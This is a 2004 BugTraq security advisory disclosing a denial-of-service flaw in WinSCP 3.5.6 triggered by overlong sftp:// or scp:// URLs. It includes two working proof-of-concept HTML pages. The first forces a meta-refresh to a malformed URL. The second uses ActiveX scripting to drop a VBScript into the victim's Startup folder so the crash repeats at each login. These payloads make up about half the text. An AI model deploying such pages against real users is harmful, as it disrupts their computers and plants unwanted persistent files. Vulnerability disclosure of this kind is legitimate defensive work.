BugTraq
WinSCP Denial of Service Apr 15 2004 06:17AM
Luca Ercoli (luca e seeweb com)


Package: WinSCP

Auth: http://winscp.sourceforge.net

Version(s): 3.5.6 (maybe also prior versions are vulnerable)

Vulnerability: Denial of Service

What?s WinSCP:

?WinSCP is an open source SFTP (SSH File Transfer Protocol) and

SCP (Secure CoPy) client for Windows using SSH (Secure SHell).

Its main function is safe copying of files between a local and

a remote computer.?

Vulnerability Description:

A default installation of WinSCP provide the user with

functionality to handle sftp:// and scp:// addresses.

The vulnerability exists due to the way the application

handles long URL?s. A malformed scp:// or sftp:// address

embedded in a HTML tag cause the WinSCP application to

exhaust CPU and Memory resources.

The attacker would need the ability to convince the user

to visiting a web site he controlled or opening an HTML

e-mail he had prepared. During the denial of service,

WinSCP will not display any GUI.

Goal:

An attacker may use this flaw to prevent the users of attacked

host from working properly.

Pratical Examples:

------ WinSCP_DoS1.html --------

<HTML>

<HEAD>

<TITLE>WinSCP DoS</TITLE>

<meta http-equiv="Refresh" content="0; URL=sftp://AAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA">

</HEAD>

<BODY>

</BODY>

</HTML>

----------------------------------

-------- WinSCP_DoS2.html -------

<html>

<head>

<title>WinSCP DoS</title>

<script language="JScript">

var WshShell = new ActiveXObject("WScript.Shell");

strSU = WshShell.SpecialFolders("StartUp");

var fso = new ActiveXObject("Scripting.FileSystemObject");

var vibas = fso.CreateTextFile(strSU + "\\WinSCPDoS.vbs",true);

vibas.WriteLine("Dim shell");

vibas.WriteLine("Dim quote");

vibas.WriteLine("Dim DoS");

vibas.WriteLine("Dim param");

vibas.WriteLine("DoS = \"C:\\Programmi\\WinSCP3\\WinSCP3.exe\"");

vibas.WriteLine("param = \"scp://AAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"");

vibas.WriteLine("set shell = WScript.CreateObject(\"WScript.Shell\")");

vibas.WriteLine("quote = Chr(34)");

vibas.WriteLine("pgm = \"explorer\"");

vibas.WriteLine("shell.Run quote & DoS & quote & \" \" & param");

vibas.Close();

</script>

</head>

</html>

----------------------------------

Credits:

--

Luca Ercoli <luca.e [at] seeweb.com>

Seeweb http://www.seeweb.com

[ reply ]
 

Privacy Statement
Copyright 2010, SecurityFocus